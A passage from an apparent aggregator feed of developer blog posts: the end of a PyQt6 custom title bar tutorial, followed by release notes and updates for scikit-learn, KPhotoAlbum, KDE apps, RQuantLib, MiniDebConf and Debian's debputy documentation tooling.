        central_widget.setStyleSheet(
            """#Container {
                background: qlineargradient(x1:0 y1:0, x2:1 y2:1, stop:0 #051c2a stop:1 #44315f);
                border-radius: 5px;
            }"""
        )
        self.title_bar = CustomTitleBar(self)
        # ...
```
We've taken the existing central_widget object and assigned an object name to it. This is an ID which we can use to refer to the widget from QSS, to apply our styles specifically to that widget.
If you're familiar with CSS you might expect that IDs like #Container must be unique. However, they are not: you can give multiple widgets the same object name if you like. So you can re-use this technique and QSS on multiple windows in your application without problems.
With this style applied on our window, we have a nice gradient background with curved corners.
Unfortunately, the title bar we created is drawn filled, and so the background and curved corners of our window are over-written. To make things look coherent we need to make our title bar also transparent by removing the background color & auto-fill behavior we set earlier.
We don't need to set any flags or attributes on this widget because it is not a window. A QWidget object is transparent by default.
We can also make some tweaks to the style of the title label, such as adjusting the font size and making the title capitalized using text-transform: uppercase -- feel free to customize this yourself.
```python
class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        # self.setAutoFillBackground(True)  # <-- remove
        # self.setBackgroundRole(QPalette.ColorRole.Highlight)  # <-- remove
        self.initial_pos = None
        title_bar_layout = QHBoxLayout(self)
        title_bar_layout.setContentsMargins(1, 1, 1, 1)
        title_bar_layout.setSpacing(2)
        self.title = QLabel(f"{self.__class__.__name__}", self)
        self.title.setAlignment(Qt.AlignmentFlag.AlignCenter)
        self.title.setStyleSheet(
            """
            QLabel {
                text-transform: uppercase;
                font-size: 10pt;
                margin-left: 48px;
            }
            """
        )
```
QSS is very similar to CSS, especially for text styling.
The margin-left: 48px compensates for the 3 * 16px window icons on the right-hand side so that the text aligns centrally.
The icons are currently using built-in Qt icons which are a little bit plain & ugly. Next let's update the icons, using custom SVG icons of simple colored circles, for the minimize, maximize, close & restore buttons.
```python
from PyQt6.QtGui import QIcon

# ...

class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        # ...
        # Min button
        self.min_button = QToolButton(self)
        min_icon = QIcon()
        min_icon.addFile('min.svg')
        self.min_button.setIcon(min_icon)
        self.min_button.clicked.connect(self.window().showMinimized)

        # Max button
        self.max_button = QToolButton(self)
        max_icon = QIcon()
        max_icon.addFile('max.svg')
        self.max_button.setIcon(max_icon)
        self.max_button.clicked.connect(self.window().showMaximized)

        # Close button
        self.close_button = QToolButton(self)
        close_icon = QIcon()
        close_icon.addFile('close.svg')  # Close has only a single state.
        self.close_button.setIcon(close_icon)
        self.close_button.clicked.connect(self.window().close)

        # Normal button
        self.normal_button = QToolButton(self)
        normal_icon = QIcon()
        normal_icon.addFile('normal.svg')
        self.normal_button.setIcon(normal_icon)
        self.normal_button.clicked.connect(self.window().showNormal)
        self.normal_button.setVisible(False)
        # ...
```
This code follows the same basic structure as before, but instead of using the built-in icons here we're loading our icons from SVG images. These images are very simple, consisting of a single circle in green, red or yellow for the different states mimicking macOS.
The normal.svg file for returning a maximized window to normal size shows a semi-transparent green circle for simplicity's sake, but you can include iconography and hover behaviors on the buttons if you prefer.
You can download these icons & all source code for this tutorial here: https://downloads.pythonguis.com/custom-title-bar-pyqt6.zip
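If you'd rather generate placeholder icons yourself instead of downloading them, here is a minimal sketch that writes four simple circle SVGs. The file names match the ones used above; the exact colors and markup are just one plausible choice, mimicking macOS-style traffic-light buttons:
```python
# Sketch: generate placeholder circle icons for the title bar buttons.
# The file names come from the tutorial; colors and opacity are assumptions.
SVG_TEMPLATE = (
    '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">'
    '<circle cx="8" cy="8" r="7" fill="{fill}" fill-opacity="{opacity}"/>'
    "</svg>"
)

ICONS = {
    "min.svg": ("#f5bf4f", 1.0),     # yellow: minimize
    "max.svg": ("#61c554", 1.0),     # green: maximize
    "close.svg": ("#ed6a5e", 1.0),   # red: close
    "normal.svg": ("#61c554", 0.5),  # semi-transparent green: restore
}

for filename, (color, opacity) in ICONS.items():
    with open(filename, "w") as f:
        f.write(SVG_TEMPLATE.format(fill=color, opacity=opacity))
```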
The final step is to iterate through the created buttons, adding them to the title bar layout. This is slightly tweaked from before: we remove the border styling, replacing it with simple padding, and set the icon sizes to 16px. Because we are using SVG files the icons will automatically scale to the available space.
```python
class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        # ...
        for button in buttons:
            button.setFocusPolicy(Qt.FocusPolicy.NoFocus)
            button.setFixedSize(QSize(16, 16))
            button.setStyleSheet(
                """QToolButton {
                    border: none;
                    padding: 2px;
                }
                """
            )
            title_bar_layout.addWidget(button)
```
And that's it! With these changes, you can now run your application and you'll see a nice, sleek, modern-looking UI with a unified title bar and custom controls.
The final result, showing our unified title bar and window design.
The complete code is shown below:
```python
from PyQt6.QtCore import QEvent, QSize, Qt
from PyQt6.QtGui import QIcon
from PyQt6.QtWidgets import (
    QApplication,
    QHBoxLayout,
    QLabel,
    QMainWindow,
    QStyle,
    QToolButton,
    QVBoxLayout,
    QWidget,
)


class CustomTitleBar(QWidget):
    def __init__(self, parent):
        super().__init__(parent)
        self.initial_pos = None
        title_bar_layout = QHBoxLayout(self)
        title_bar_layout.setContentsMargins(1, 1, 1, 1)
        title_bar_layout.setSpacing(2)

        self.title = QLabel(f"{self.__class__.__name__}", self)
        self.title.setAlignment(Qt.AlignmentFlag.AlignCenter)
        self.title.setStyleSheet(
            """
            QLabel {
                text-transform: uppercase;
                font-size: 10pt;
                margin-left: 48px;
            }
            """
        )
        if title := parent.windowTitle():
            self.title.setText(title)
        title_bar_layout.addWidget(self.title)

        # Min button
        self.min_button = QToolButton(self)
        min_icon = QIcon()
        min_icon.addFile("min.svg")
        self.min_button.setIcon(min_icon)
        self.min_button.clicked.connect(self.window().showMinimized)

        # Max button
        self.max_button = QToolButton(self)
        max_icon = QIcon()
        max_icon.addFile("max.svg")
        self.max_button.setIcon(max_icon)
        self.max_button.clicked.connect(self.window().showMaximized)

        # Close button
        self.close_button = QToolButton(self)
        close_icon = QIcon()
        close_icon.addFile("close.svg")  # Close has only a single state.
        self.close_button.setIcon(close_icon)
        self.close_button.clicked.connect(self.window().close)

        # Normal button
        self.normal_button = QToolButton(self)
        normal_icon = QIcon()
        normal_icon.addFile("normal.svg")
        self.normal_button.setIcon(normal_icon)
        self.normal_button.clicked.connect(self.window().showNormal)
        self.normal_button.setVisible(False)

        # Add buttons
        buttons = [
            self.min_button,
            self.normal_button,
            self.max_button,
            self.close_button,
        ]
        for button in buttons:
            button.setFocusPolicy(Qt.FocusPolicy.NoFocus)
            button.setFixedSize(QSize(16, 16))
            button.setStyleSheet(
                """QToolButton {
                    border: none;
                    padding: 2px;
                }
                """
            )
            title_bar_layout.addWidget(button)

    def window_state_changed(self, state):
        if state == Qt.WindowState.WindowMaximized:
            self.normal_button.setVisible(True)
            self.max_button.setVisible(False)
        else:
            self.normal_button.setVisible(False)
            self.max_button.setVisible(True)

    def mousePressEvent(self, event):
        if event.button() == Qt.MouseButton.LeftButton:
            self.initial_pos = event.position().toPoint()
        super().mousePressEvent(event)
        event.accept()

    def mouseMoveEvent(self, event):
        if self.initial_pos is not None:
            delta = event.position().toPoint() - self.initial_pos
            self.window().move(
                self.window().x() + delta.x(),
                self.window().y() + delta.y(),
            )
        super().mouseMoveEvent(event)
        event.accept()

    def mouseReleaseEvent(self, event):
        self.initial_pos = None
        super().mouseReleaseEvent(event)
        event.accept()


class MainWindow(QMainWindow):
    def __init__(self):
        super().__init__()
        self.setWindowTitle("Custom Title Bar")
        self.resize(400, 200)
        self.setWindowFlags(Qt.WindowType.FramelessWindowHint)
        self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground)

        central_widget = QWidget()
        # This container holds the window contents, so we can style it.
        central_widget.setObjectName("Container")
        central_widget.setStyleSheet(
            """#Container {
                background: qlineargradient(x1:0 y1:0, x2:1 y2:1, stop:0 #051c2a stop:1 #44315f);
                border-radius: 5px;
            }"""
        )

        self.title_bar = CustomTitleBar(self)

        work_space_layout = QVBoxLayout()
        work_space_layout.setContentsMargins(11, 11, 11, 11)
        work_space_layout.addWidget(QLabel("Hello, World!", self))

        central_widget_layout = QVBoxLayout()
        central_widget_layout.setContentsMargins(0, 0, 0, 0)
        central_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop)
        central_widget_layout.addWidget(self.title_bar)
        central_widget_layout.addLayout(work_space_layout)
        central_widget.setLayout(central_widget_layout)

        self.setCentralWidget(central_widget)

    def changeEvent(self, event):
        if event.type() == QEvent.Type.WindowStateChange:
            self.title_bar.window_state_changed(self.windowState())
        super().changeEvent(event)
        event.accept()


if __name__ == "__main__":
    app = QApplication([])
    window = MainWindow()
    window.show()
    app.exec()
```
Conclusion
In this tutorial, we have learned the fundamentals of creating custom title bars in PyQt. To do this, we have combined PyQt's widgets, layouts, and styling capabilities to create a visually appealing title bar for a PyQt app.
With this skill under your belt, you're now ready to create title bars that align perfectly with your application's unique style and branding. This will allow you to break away from the standard window decoration provided by your operating system and add a personal touch to your user interface.
Now let your imagination run and transform your PyQt application's UX.
qtatech.com blog: Expert Help on Deck: The Importance of a Drupal Maintenance Service for Your Business
In today's digital age, it is crucial for businesses to have a strong online presence. With the rise of content management systems like Drupal, companies are able to create and manage their websites with ease. However, as with any technology, regular maintenance is necessary to ensure the smooth functioning and security of your website. This is where a Drupal maintenance service comes in.
PyCharm: What is the Django Web Framework?
LN Webworks: Is Drupal best CMS for Health, Wellness, and Fitness Organizations
As health, wellness, and fitness organizations navigate the ever-evolving digital space, the need for a versatile content management system (CMS) has become increasingly important. Out of the many CMS, Drupal has emerged as a frontrunner for these organizations, offering an all-rounded suite of features that smoothly align with their specific requirements.
In fact, did you know that some of the top health, wellness, and fitness giants like the American Heart Association, Mayo Clinic, National Cancer Institute, and YMCA rely on Drupal for healthcare solutions?
In the following sections, let's have a detailed look at some of the top reasons that make Drupal the best choice for health, wellness, and fitness organizations.
We will also take a moment to highlight its ability to enhance online engagement, streamline content management, and cultivate a flourishing digital presence.
scikit-learn: My mentored internship at scikit-learn
How it is to be an Intern at scikit-learn
My name is Stefanie Senger, and I recently concluded a five-month mentored internship at scikit-learn, that had been funded by NumFocus as a Small Development Grant with a clear focus on fostering diversity in open-source projects. The idea to couple a grant with mentorship traces back to Maren Westermann’s initiative. She envisioned a pathway to integrate more female coders into scikit-learn through internships and support. Scikit-learn would profit from fresh perspectives and some disruption. I was the guinea pig for an initial experiment, as Maren later told me.
Starting the Internship
As someone transitioning from a non-technical background to coding, working on scikit-learn was a big thing for me. I had participated in and taught at a data science boot camp, searching diligently for a first role in the field. I never doubted I could tackle more difficult tech challenges over time, but I knew there was much to learn. Scikit-learn had a heavy-tech aura to me, and when I discovered the internship ad, I just thought: this. I was genuinely taken aback when accepted for the role, though. There are many more experienced people looking for such an opportunity, after all.
When I got to know both my mentors, Adrin Jalali and Guillaume Lemaitre, better, it quickly became clear that only effort was required and that I could ask them any question along the way. I felt very welcome in the community, also by the other people I interacted with on GitHub.
What I Worked on
I began by working on documentation and examples, such as "Multi-class AdaBoosted Decision Trees," to make them more comprehensive and helpful for users. Then I did some repetitive maintenance tasks on the code, where I could find out what to do from other contributors' pull requests. Guillaume discovered that one AdaBoost algorithm required deprecation, and it fell on me to execute this. I had never looked at such a huge code base with so many layers of abstraction, and I had to learn quite a bit more Python to be able to go ahead. I even got the opportunity to present an "Intro to scikit-learn" workshop at EuroSciPy, the European conference on the scientific use of Python, in Basel, where I also got to know many other contributors and people from the scikit-learn team at Inria.
Adrin introduced me to the challenging task of implementing a new feature for metadata routing, developed over many years by the scikit-learn community. It allows users to set metadata, such as sample weights, in meta estimators, that can be routed to sub-estimators and other algorithms that are able to consume it. This was partly uncharted territory and meant finding solutions where there was no predefined path and adapting tests to match the expected behavior. In the last two months of my internship, I implemented metadata routing into some meta-estimators, which was tremendously difficult but, once accomplished, has nourished my professional confidence since.
Mentorship in Action
Let me describe how the mentoring worked, because Guillaume's and Adrin's support was invaluable. They would both literally drop their tasks when I had questions and point me in the right direction right away. I met Adrin twice a week, and we would co-work while I threw questions at him. Guillaume was available remotely, and I knew he would jump into a video call with me when I needed help. They both made reviewing my PRs a priority, and I got feedback on my work regularly.
It was essential to have mentors signaling that it’s okay to be learning and to propose tasks to me. If I had come into the project individually, I might have hesitated to take on most of the issues I ended up working on, fearing that my skills were insufficient and that I would hinder the progress of the project rather than help it. The mentoring setting gave me a justification to try things that I wasn’t sure if I could do.
Becoming a Community Member
Looking ahead, I will continue contributing to scikit-learn. As I've gotten to know quite a few of the other contributors in person, I now feel part of the community. I know they care about values like openness and diversity, which I share, and while acknowledging the complexity of the code base, I know what I can learn from taking on issues and the sense of accomplishment when merging my solution into the main branch. And I love contributing to something meaningful, which is something I had always sought.
Anniversary release: KPhotoAlbum 5.12.0
We're happy to announce the new release 5.12.0 of KPhotoAlbum, the KDE photo management program!
20 years KPhotoAlbum
This is some kind of "special" release, as exactly 20 years ago, on 2003-11-27, version 1.0 was tagged (we already tagged this release on Saturday, so that it would hit the mirrors and we could publish this release announcement on this very date ;-).
20 years is quite a long time for such a "small" FLOSS project. All too often, nice programs die from bit rot, because the only dev or too many of the few lose interest, don't need the program anymore, and/or nobody wants to take over maintainership. Happily, this is not the case for KPA! After all these years, the project is still alive and kicking, and, when family, the job and everything else allow it (after all, none of us are full-time KPA devs), we work on it to make it better.
Just speaking of me, I joined the project back in 2014, almost ten years ago now (which is arguably also quite a long period of time). And I'm really proud to still be a part of this great project :-)
So, I think it's time to especially thank Jesper Pedersen for initiating the project back then, and Johannes Zarl-Zierl for taking over the maintainership and being the project leader since 2019! Joyfully, Jesper never really stopped contributing to KPA and still works on it until now.
After all, we're still – without too much self-laudation – a small but excellent crew of FLOSS enthusiasts ;-)
But about the release itself:
What's new?
Bugfixes
Most notably, we could fix a really large number of crashes and unexpected behaviors. The following bug reports could be closed as "fixed": #472427, #472523, #473231, #473324, #473587, #473762, #474151, #474392, #475387, #475388, #475529, #475585, #476131, #476561, #476651, #476862 and #477195. That's quite an impressive list, isn't it?!
Kudos to our new super-diligent beta tester Victor Lobo for filing 17 of those bug reports alone, always providing meaningful information about how to reproduce the issue and tirelessly testing the fixes. Thank you! As a dev, you really appreciate this! Apart from that, also big thanks to Pierre Etchemaïté and Andreas Schleth for providing equivalently excellent bug reports!
Thanks to you all for helping make KPhotoAlbum better!
New features and changes
Apart from that, there are also some new interesting features:
- Support annotating images from the viewer by using letters to assign tags. Use the context menu and select "Annotate | Assign Tags" to enable. More information is available in the KPhotoAlbum handbook.
- Add option to sort category page by natural order (feature #475339). Natural sort order takes the locale into account and sorts numeric values properly (e.g. sort "9" before "10").
- Allow selecting a date range in the DateBar via keyboard (Use "Shift + Left|Right")
- Allow closing the annotation dialog's fullscreen preview using the Escape key.
… as well as some changes:
- In the viewer window, using the letters A-Z to assign tokens now needs to be explicitly enabled. You can do this by opening the context menu and selecting "Annotate | Assign Tokens".
- When KPhotoAlbum is started in demo mode and a previously saved demo database exists, the old demo database is no longer overwritten.
- The ui.rc file (kphotoalbumui.rc) is now deployed as a Qt resource instead of an on-disk file.
- Improved usability of "Invoke external program" menu (#474819)
- No longer set the default shortcut for "Use current video frame in thumbnail view" to Ctrl+S and avoid shortcut conflict.
- Restrict context menu entries for fullscreen preview of annotation dialog to a sane set of actions.
- It is no longer possible to annotate images from the viewer by pressing "/" and typing tag names.
- It is no longer possible to change an image through the annotation dialog's fullscreen image preview.
According to git, the following individuals pushed commits:
- Yuri Chornoivan
- Friedrich W. H. Kossebau
- Nicholas Leggiero
- Tobias Leupold
- Alexander Lohnau
- Scarlett Moore
- Jesper K. Pedersen
- Johannes Zarl-Zierl
Thanks for spending your time with coding on KPA and for contributing your work!
Have a lot of fun with the new release, and keep KPA the best photo management program out there, also for the 20 years to come :-)
My work in KDE for November 2023
We’re already in November, but I managed to do a lot of work this month which I’m really happy about.
Quickly something that’s not strictly programming: I was accepted as a member of KDE e.V. early this month, thank you all very much! I was also given moderation powers on Discuss so maybe it will stop rate limiting me when moving posts around.
I also went on a crusade of merging and triaging merge requests on Invent, which some of you might've seen. Notably, I was able to take care of one or two pages' worth of open MRs, which I'm really happy about.
Without further ado, let’s begin.
Plasma #Feature Merged the Game Controller KCM into Plasma, starting with a simple rewrite in QML. I’m aiming to add back the visual representation in 6.1 (which still exists in the standalone repository if you want to take a shot at it.) At least for right now the code is much better and it supports more devices than the 5.X Joystick KCM ever could. 6.0
The new and not much improved Game Controller KCM
My hope is that since it's much cleaner and easier to work with, it would invite more contributors… and it's already doing that as we speak! :-)
NeoChat #Feature Blockquotes now look more like quotes, and no longer just somewhat indented blocks of text. 24.02
New blockquote stylings
Bugfix You can now right-click (or long tap) on rooms to access the context menu without switching to it. I gave spaces the same treatment a while back. 24.02
Feature Added UnifiedPush support! It’s functional already and I have used it to receive push notifications even when NeoChat is closed. 24.02
Tokodon #Feature I merged the post redesign I was teasing on Mastodon, which includes better margins and standalone tags. 24.02
The new post design, which includes standalone tags!
Feature The language selector is now a regular dialog and not the buggy custom combo box we had before. It now displays the native language name, if available. 24.02
The new language selector
Feature Muting and blocking users has been accessible through profile pages, and now those actions are present in the post menu like on Mastodon Web. Useful for taking action against harmful users without navigating to a cesspool of a profile too. 24.02
Feature Added a report dialog. It’s a little basic right now, which I want to improve before release. 24.02
The new report dialog
Feature Rebased and merged Rishi's Moderation Tool, which works fantastically, and I used it to test my reporting feature! 24.02
Feature Added a way to filter out boosts and replies from timeline pages. 24.02
New filter controlsFeature Added supports for lists. You can’t add people to lists (you must use another client to do that) but you can at least view and manage them. 24.02
New list management
Kiten #Bugfix Marked the X11 socket as fallback. This removes a warning on the Flathub page about the deprecated windowing system. 23.08
Now the Flathub page is all green!
Bugfix Numerous UI improvements, such as improving the margins of configuration dialogs. I also redid the toolbar layout. 24.02
The new toolbar layout
Feature Added a search function to the Kanji browser. 24.02
Kirigami #Bugfix Fixed an edge case of ToolBar incubation, which liked to spam logs. I squashed some other log spam, so Kirigami applications should be less noisy. 6.0
Feature Added a property to FlexColumn that allows you to read the inner column’s width. We use this in Tokodon to set the width of the separator between posts. 6.0
Craft #I’m getting addicted to fixing Craft recipes, and there’s a lot to fix in the upcoming 6.0 megarelease:
- Preparing Tokodon for Qt6
- Preparing MPV for an eventual Windows build by only requiring Linux-specific video APIs on Linux
- Added a blueprint for MpvQt for future use in Tokodon and PlasmaTube
- Added a KUnifiedPush blueprint for future use in Tokodon and NeoChat
- Preparing KWeatherCore for Qt6
- Preparing KWeather for Qt6
Feature Improved the look of it’s KCM. Not only does it look nice, and it’s design is more in line with other list based ones.
The new look for the Push Notifications KCM!
PlasmaTube #Feature Added better hover effects for video items. I did a bunch of refactoring to unify the two types (list and grid) so they work better in general (especially for keyboard-only navigation.) 24.02
Feature Added a video queue system, which is exactly what you think it is. You can queue up an entire playlist, or add videos manually like on YouTube. 24.02
Feature Different types of search results are supported now, so you can find channels and playlists. 24.02
Feature Public Piped instances are now fetched and displayed on initial setup. 24.02
Feature Features of PlasmaTube that are unsupported by the current video source are now disabled or hidden. This should result in less buggy and broken looking behavior depending on which video source you use. 24.02
Feature Added support for MPRIS, which is used by the Media Player applet, the lockscreen and KDE Connect. 24.02
Accessibility #Bugfix Fixed our spinboxes not being read correctly by screen readers, since they were editable by default. Now the accessible descriptions and other data is passed down to the text field. Fixed in QQC2 Desktop Style (used on Plasma Desktop) and QQC2 Breeze Style (Plasma Mobile and Android.) 6.0
Documentation #Found lots more missing Bugzilla links in Invent, and did some more README updating!
- Added missing Bugzilla link for Ruqola
- Updated README for Kiten, adding a screenshot
- Added Snap store links for NeoChat and Tokodon
- Added missing Bugzilla product for kdesrc-build
- Expanded plasma-integration’s README
- Wrote the README for our new Accessibility Inspector
- Expanded the README for qqc2-desktop-style, and now contains usage information and why it’s different than qqc2-breeze-style. Did the same for qqc2-breeze-style too
Bugfix Fixed the setup wizard. 24.02
Upcoming #Feature Not merged yet, but I’m adding a pen calibration tool to the Tablet KCM. If you have the required equipment and can test, please help out! It’s cutting it close to the feature freeze, so this will most likely be pushed off until 6.1.
The new calibrator
See you in December!
Paolo Melchiorre: 2024 Django Software Foundation board nomination
My self-nomination statement for the 2024 Django Software Foundation (DSF) board of directors elections
TestDriven.io: Django REST Framework and Elasticsearch
Dirk Eddelbuettel: RQuantLib 0.4.20 on CRAN: More Maintenance
A new release 0.4.20 of RQuantLib arrived at CRAN earlier today, and has already been uploaded to Debian as well.
QuantLib is a rather comprehensive free/open-source library for quantitative finance. RQuantLib connects (some parts of) it to the R environment and language, and has been part of CRAN for more than twenty years (!!) as it was one of the first packages I uploaded there.
This release of RQuantLib brings a few more updates for nags triggered by recent changes in the upcoming R release (aka ‘r-devel’, usually due in April). The Rd parser now identifies curly braces that lack a preceding macro, usually a typo, as it was here, where it affected three files. The printf (or alike) format checker found two more small issues. The run-time checker for examples was unhappy with the callable bond example, so we only run it in interactive mode now. I had already commented-out the setting for a C++14 compilation (required by the remaining Boost headers) as C++14 has been the default since R 4.2.0 (with suitable compilers, at least); those who need it explicitly will have to uncomment the line in src/Makevars.in. Lastly, the expanded printf format string checks also revealed a need for a small change in Rcpp, so the development version (now 1.0.11.5) has that addressed; the change will be part of Rcpp 1.0.12 in January.
Changes in RQuantLib version 0.4.20 (2023-11-26)Correct three help pages with stray curly braces
Correct two printf format strings
Comment-out explicit selection of C++14
Wrap one example inside 'if (interactive())' to not exceed total running time limit at CRAN checks
Courtesy of my CRANberries, there is also a diffstat report for this release 0.4.20. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list. Issue tickets can be filed at the GitHub repo.
If you like this or other open-source work I do, you can now sponsor me at GitHub.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.
Andrew Cater: MiniDebConf Cambridge - 26th November 2023 - Afternoon sessions
Sadly, nothing too much to report.
I delivered a very quick three slides lightning talk on Accessibility, WCAG [Web Content Accessibility Guidelines] version 2.2 and a request for Debian to do better
WCAG 2.2: WCAG 2.2 Abstract
Debian-accessibility mailing list link: debian-accessibility
I watched the other lightning talks but then left at 1500 - missing three good talks - to drive home at least partly in daylight.
A great four days - the chance to put some names to faces and to recharge in Debian spaces.
Thanks to Cambridge Debian folk for helping arrange evening meals, lifts and so on, and especially to those who also happen to be ARM employees and were badging us in and out throughout the four days.
Thanks to those who staffed Front Desk on both days and, especially, also to the ARM security guards who let us into site at 0745 on all four days and to Mark who did the weekend shift inside the building for Saturday and Sunday.
Thanks to ARM for excellent facilities, food, coffee, hosting us and coffee, to Codethink for sponsoring - and a lecture from Sudip and some interesting hardware - and Pexip for Pexip sponsorship (and employee attendance).
Here's to the next opportunity, whenever that may be.
Niels Thykier: Providing online reference documentation for debputy
I do not think seasoned Debian contributors quite appreciate how much knowledge we have picked up and internalized. As an example, when I need to look up documentation for debhelper, I generally know which manpage to look in. I suspect most long-time contributors would be able to do a similar thing (maybe narrowing it down to 2-3 manpages). But new contributors do not have the luxury of years of experience. This problem is by no means unique to debhelper.
One thing that debhelper does very well is that it is hard for users to tell where an addon "starts" and debhelper "ends". It is clear you use addons, but the transition in and out of third-party provided tools is generally smooth. This is a sign that things "just work(tm)".
Except when it comes to documentation. Here, debhelper's static documentation does not include documentation for third-party tooling. If you think from a debhelper maintainer's perspective, this seems obvious. Embedding documentation for all the third-party code would be very hard work, a layer violation, etc. But from a user perspective, we should not have to care "who" provides "what". As a user, I want to understand how this works, and the more hoops I have to jump through to get that understanding, the more frustrated I will be with the toolstack.
With this, I came to the conclusion that the best way to help users and solve the problem of finding the documentation was to provide "online documentation". It should be possible to ask debputy, "What attributes can I use in install-man?" or "What does path-metadata do?". Additionally, the lookup should work the same no matter if debputy provided the feature or some third-party plugin did. In the future, perhaps also other types of documentation such as tutorials or how-to guides.
Below, I have some tentative results of my work so far. There are some improvements to be done. Notably, the commands for these documentation features are still treated as "plugin" subcommand features and should probably get their own top-level "ask-me-anything" subcommand in the future.
Automatic discard rules
Since the introduction of install rules, debputy has included an automatic filter mechanism that prunes out unwanted content. In 0.1.9, these filters have been named "Automatic discard rules" and you can now ask debputy to list them.
```
$ debputy plugin list automatic-discard-rules
+-----------------------+-------------+
| Name                  | Provided By |
+-----------------------+-------------+
| python-cache-files    | debputy     |
| la-files              | debputy     |
| backup-files          | debputy     |
| version-control-paths | debputy     |
| gnu-info-dir-file     | debputy     |
| debian-dir            | debputy     |
| doxygen-cruft-files   | debputy     |
+-----------------------+-------------+
```
For these rules, the provider can provide both a description and an example of their usage.
```
$ debputy plugin show automatic-discard-rules la-files
Automatic Discard Rule: la-files
================================

Documentation: Discards any .la files beneath /usr/lib

Example
-------
    /usr/lib/libfoo.la        << Discarded (directly by the rule)
    /usr/lib/libfoo.so.1.0.0
```
The example is a live example. That is, the provider will provide debputy with a scenario and the expected outcome of that scenario. Here is the concrete code in debputy that registers this example:
```python
api.automatic_discard_rule(
    "la-files",
    _debputy_prune_la_files,
    rule_reference_documentation="Discards any .la files beneath /usr/lib",
    examples=automatic_discard_rule_example(
        "usr/lib/libfoo.la",
        ("usr/lib/libfoo.so.1.0.0", False),
    ),
)
```
When showing the example, debputy will validate that the example matches what the plugin provider intended. Let's say I were to introduce a bug in the code, so that the discard rule no longer worked. Then debputy would start to show the following:
```
# Output if the code or example is broken
$ debputy plugin show automatic-discard-rules la-files
[...]
Automatic Discard Rule: la-files
================================

Documentation: Discards any .la files beneath /usr/lib

Example
-------
    /usr/lib/libfoo.la          !! INCONSISTENT (code: keep, example: discard)
    /usr/lib/libfoo.so.1.0.0

debputy: warning: The example was inconsistent. Please file a bug against the plugin debputy
```
Obviously, it would be better if this validation could be added directly as a plugin test, so the CI pipeline would catch it. That is one item on my personal TODO list. :)
One final remark about automatic discard rules before moving on. In 0.1.9, debputy will also list any path automatically discarded by one of these rules in the build output to make sure that the automatic discard rule feature is more discoverable.
Plugable manifest rules like the install rule
In the manifest, there are several places where rules can be provided by plugins. To make life easier for users, debputy can now since 0.1.8 list all provided rules:
$ debputy plugin list plugable-manifest-rules +-------------------------------+------------------------------+-------------+ | Rule Name | Rule Type | Provided By | +-------------------------------+------------------------------+-------------+ | install | InstallRule | debputy | | install-docs | InstallRule | debputy | | install-examples | InstallRule | debputy | | install-doc | InstallRule | debputy | | install-example | InstallRule | debputy | | install-man | InstallRule | debputy | | discard | InstallRule | debputy | | move | TransformationRule | debputy | | remove | TransformationRule | debputy | | [...] | [...] | [...] | | remove | DpkgMaintscriptHelperCommand | debputy | | rename | DpkgMaintscriptHelperCommand | debputy | | cross-compiling | ManifestCondition | debputy | | can-execute-compiled-binaries | ManifestCondition | debputy | | run-build-time-tests | ManifestCondition | debputy | | [...] | [...] | [...] | +-------------------------------+------------------------------+-------------+(Output trimmed a bit for space reasons)
And you can then ask debputy to describe any of these rules:
$ debputy plugin show plugable-manifest-rules install
Generic install (`install`)
===========================
The generic `install` rule can be used to install arbitrary paths into packages
and is *similar* to how `dh_install` from debhelper works. It has two "primary"
uses.

 1) The classic "install into directory" similar to the standard `dh_install`
 2) The "install as" similar to `dh-exec`'s `foo => bar` feature.

Attributes:
 - `source` (conditional): string
   `sources` (conditional): List of string
   A path match (`source`) or a list of path matches (`sources`) defining the
   source path(s) to be installed. [...]
 - `dest-dir` (optional): string
   A path defining the destination *directory*. [...]
 - `into` (optional): string or a list of string
   The name of the package (or packages) the source should be installed into. [...]
 - `as` (optional): string
   A path defining the path to install the source as. [...]
 - `when` (optional): manifest condition (string or mapping of string)
   A condition as defined in [Conditional rules](https://salsa.debian.org/debian/debputy/-/blob/main/MANIFEST-FORMAT.md#Conditional rules).

This rule enforces the following restrictions:
 - The rule must use exactly one of: `source`, `sources`
 - The attribute `as` cannot be used with any of: `dest-dir`, `sources`
[...]

(Output trimmed a bit for space reasons)
All the attributes and restrictions are auto-computed by debputy from information provided by the plugin. The associated documentation for each attribute is supplied by the plugin itself. The debputy API validates that all attributes are covered and that the documentation does not describe non-existent fields. This ensures that you as a plugin provider never forget to document new attributes when you add them later.
The debputy API for manifest rules is not quite stable yet. So currently only debputy provides rules here. However, it is my intention to lift that restriction in the future.
I got the idea of supporting online validated examples when I was building this feature. However, sadly, I have not gotten around to supporting it yet.
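For orientation, here is a minimal sketch of what an `install` stanza could look like in a manifest. The attribute names are taken from the rule description above, but the overall layout, the example paths and the `when` condition are illustrative assumptions only; MANIFEST-FORMAT.md remains the authoritative reference:

# Sketch only; layout assumed from MANIFEST-FORMAT.md
manifest-version: "0.1"
installations:
  # "Install into directory" use: one or more sources plus an optional dest-dir.
  # The rule must use exactly one of `source`/`sources`.
  - install:
      sources:
        - usr/bin/foo
        - usr/bin/foo-admin
      dest-dir: usr/bin
  # "Install as" use: a single source installed under a new path.
  # Per the restrictions above, `as` cannot be combined with `sources` or `dest-dir`.
  - install:
      source: contrib/foo.conf.sample
      as: etc/foo/foo.conf
      # `when` takes a manifest condition; `cross-compiling` is one of the
      # conditions listed earlier and is used here purely to show the syntax.
      when: cross-compiling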
Manifest variables like {{PACKAGE}}

I also added a similar documentation feature for manifest variables such as {{PACKAGE}}. When I implemented this, I realized that listing all manifest variables by default would probably be counterproductive for new users. If you list all variables by default, DEB_HOST_MULTIARCH (the most common case) would appear side-by-side with the much less used DEB_BUILD_MULTIARCH and the even less used DEB_TARGET_MULTIARCH variable. Having them side-by-side implies they are of equal importance, which they are not. As an example, the ballpark number of unique packages for which DEB_TARGET_MULTIARCH is useful can be counted on two hands (and maybe two feet if you consider gcc-X distinct from gcc-Y).
This is one of the cases where experience makes us blind. Many of us probably have the "show me everything and I will find what I need" mentality, but it takes experience to pull that off - especially when all alternatives are presented as equals. The cross-building terminology in particular has notoriously proven to match people's expectations poorly.
